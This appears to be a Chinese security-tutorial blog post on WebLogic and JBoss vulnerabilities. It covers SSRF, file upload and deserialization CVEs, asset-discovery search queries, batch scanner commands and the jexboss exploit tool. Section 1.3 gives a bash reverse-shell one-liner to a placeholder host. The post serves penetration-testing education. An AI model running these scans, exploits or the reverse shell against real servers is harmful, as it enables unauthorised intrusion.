网安系列【16】之Weblogic和jboss漏洞

发布于:2025-07-11 ⋅ 阅读:(16) ⋅ 点赞:(0)

一 Weblogic

  • WebLogic 是由 Oracle公司 开发的一款基于Java EE(现称Jakarta EE)的企业级应用服务器,主要用于部署、运行和管理分布式Web应用、企业应用和微服务。
  • 优势:成熟稳定,适合大规模关键业务、深度集成Oracle数据库及其他中间件(如SOA Suite)。
    劣势:配置复杂,学习曲线陡峭、资源占用较高,成本昂贵(相比开源替代品如WildFly/TomEE)。
    在这里插入图片描述

1.1 Weblogic相关漏洞

在这里插入图片描述


主要受影响版本:
Weblogic 10.3.6.0
Weblogic 12.1.3.0
Weblogic 12.2.1.1
Weblogic 12.2.1.2
Weblogic 12.2.1.3
Weblogic 14.1.1.0


  • 弱口令:Weblogic存在管理后台,通过账号密码登录,由于管理员的疏忽,经常会使用弱口令,或者默认的账户名密码。
  • SSRF漏洞(CVE-2014-4210):Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻 击内网中redis、fastcgi等脆弱组件。
  • SSRF(Server-Side Request Forgery,服务器端请求伪造)。SSRF是一种安全漏洞,攻击者诱使服务器向内部或外部的非预期系统发起恶意请求,从而绕过访问控制、探测内网或攻击其他服务。
  • 漏洞原理
    1. 攻击者控制目标服务器的请求目标:通过篡改URL、参数或文件上传等功能,让服务器代替攻击者访问内网资源、第三方系统或敏感接口。
    2. 服务器的高权限:服务器通常能访问内网(如数据库、管理后台),而外部用户无法直接到达这些资源。
  • 任意文件上传漏洞 (CVE-2018-2894):Web ServiceTestPage 在"生产模式”下默认不开启,所以该漏洞有一定限制。“利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。
  • XML Dec0der反序列化漏洞(CVE-2017-10271):Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。
  • Java反序列化漏洞(CVE-2018-2628):Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授 权的用户在远程服务器执行任意命令。

1.2 Weblogic漏洞发现

  1. 获取资产:shodan、fofa、钟馗之眼等,app="BEA-WebLogic-Server"。 google hackhing inurl:漏洞地址intitle:weblogic等。
  2. 批量扫描脚本:WeblogicScan
  3. 漏洞路径:_async/AsyncResponseService
    在这里插入图片描述
    在这里插入图片描述

1.3 Weblogic漏洞利用


验证扫描结果(执行命令and反弹shell)

  • 执行扫描命令python3 WeblogicScan -f target.txt,然后利用Java反序列化漏洞利用工具,选择发现的漏洞类型和服务器的地址,进行检查,即可实现命令执行。
    在这里插入图片描述
    在这里插入图片描述
  • 反弹shell
bash -i >& /dev/tcp/ip/port 0>&1

在这里插入图片描述

二 Jboss

  • JBoss(现称 WildFly)是一款开源的、基于Java EE(现Jakarta EE)的应用服务器,由Red Hat公司开发和维护。它用于部署和管理企业级Java应用(如Web服务、分布式系统等),提供高性能、模块化架构和丰富的企业功能。
组件 功能说明
Undertow 高性能Web服务器(默认替代Tomcat),支持HTTP/2和WebSocket。
Hibernate 集成ORM框架,简化数据库操作。
Infinispan 分布式缓存系统,用于集群会话共享。
Arquillian 测试框架,支持容器内自动化测试。
Management Console Web 管理界面(默认端口9990),监控和配置服务器。

2.1 Jboss漏洞


Jboss历史漏洞 (反序列化漏洞)

  • JBoss JMXlnvokerServlet 反序列化漏洞 (CVE-2015-7501)
  • JBossEJBlnvokerServlet反序列化漏洞
  • JBosS AS 6.X 反序列化漏洞(CVE-2017-12149)
  • JBoss 4.xJBossMQJMS 反序列化漏洞(CVE-2017-7504)

Jboss历史漏洞 (访问控制不严导致的漏洞)

  • JMXConsole未授权访问Getshell
  • JMX Console HtmlAdaptor Getshell (CVE-2007-1036)
  • JMX控制台安全验证绕过漏洞(CVE-2010-0738) Administration
  • Console 弱口令 Getshell

2.2 Jboss识别与漏洞利用

  1. Jboss漏洞检测(批量):jbossScan
    在这里插入图片描述
  • CVE-2017-12149漏洞检测:http://ip:8080/invoker/readonly访问该url,若显示状态码为500的报错界面,则证明漏洞存在。
  • CVE-2017-12149漏洞概述:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Httplnvoker 组件中ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
  • CVE-2017-12149漏洞利用(反弹shell):工具https://github.com/joaomatosf/jexboss

网站公告

今日签到

点亮在社区的每一天
去签到